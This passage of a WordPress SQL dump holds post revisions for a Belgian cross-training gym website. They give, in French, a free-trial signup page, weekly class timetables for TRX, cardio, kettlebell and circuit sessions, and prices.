(275, 1, '2013-07-04 19:32:37', '2013-07-04 19:32:37', '<blockquote>\n<h1>Envie de vous essayer au cross training?</h1>\n</blockquote>\nVenez nous rencontrer afin de découvrir cross training.\n\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre première séance gratuite.\n<h1>Une séance gratuite?</h1>\nEnvie de découvrir les bienfaits du cross training?\nNous vous offrons gratuitement une première séance.\nRemplissez le formulaire ci-dessous et nous vous recontacterons pour planifier, avec vous, votre première séance.\n\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-autosave', '', '', '2013-07-04 19:32:37', '2013-07-04 19:32:37', '', 266, 'http://www.crosstrainingcenter.be/?p=275', 0, 'revision', '', 0),
(276, 1, '2013-07-03 20:45:08', '2013-07-03 20:45:08', 'Venez découvrir les bienfaits du cross training lors d\'une première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-3', '', '', '2013-07-03 20:45:08', '2013-07-03 20:45:08', '', 266, 'http://www.crosstrainingcenter.be/?p=276', 0, 'revision', '', 0),
(277, 1, '2013-07-03 20:48:13', '2013-07-03 20:48:13', '<h1>Une séance gratuite?</h1>\r\nEnvie de découvrir les bienfaits du cross training?\r\nNous vous offrons gratuitement une première séance.\r\nRemplissez le formulaire ci-dessous et nous vous recontacterons pour planifier avec vous votre première séance. \r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-4', '', '', '2013-07-03 20:48:13', '2013-07-03 20:48:13', '', 266, 'http://www.crosstrainingcenter.be/?p=277', 0, 'revision', '', 0),
(317, 1, '2013-07-04 16:35:10', '2013-07-04 16:35:10', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:35:10', '2013-07-04 16:35:10', '', 11, 'http://www.crosstrainingcenter.be/11-revision-104/', 0, 'revision', '', 0),
(278, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 11, 'http://www.crosstrainingcenter.be/?p=278', 0, 'revision', '', 0),
(279, 1, '2013-07-03 21:04:43', '2013-07-03 21:04:43', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 21:04:43', '2013-07-03 21:04:43', '', 11, 'http://www.crosstrainingcenter.be/?p=279', 0, 'revision', '', 0),
(321, 1, '2013-07-10 15:43:05', '2013-07-10 15:43:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:43:05', '2013-07-10 15:43:05', '', 11, 'http://www.crosstrainingcenter.be/11-revision-108/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(280, 1, '2013-07-04 16:23:57', '2013-07-04 16:23:57', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">X</td>\r\n<td class=\"tcellule\">X</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité 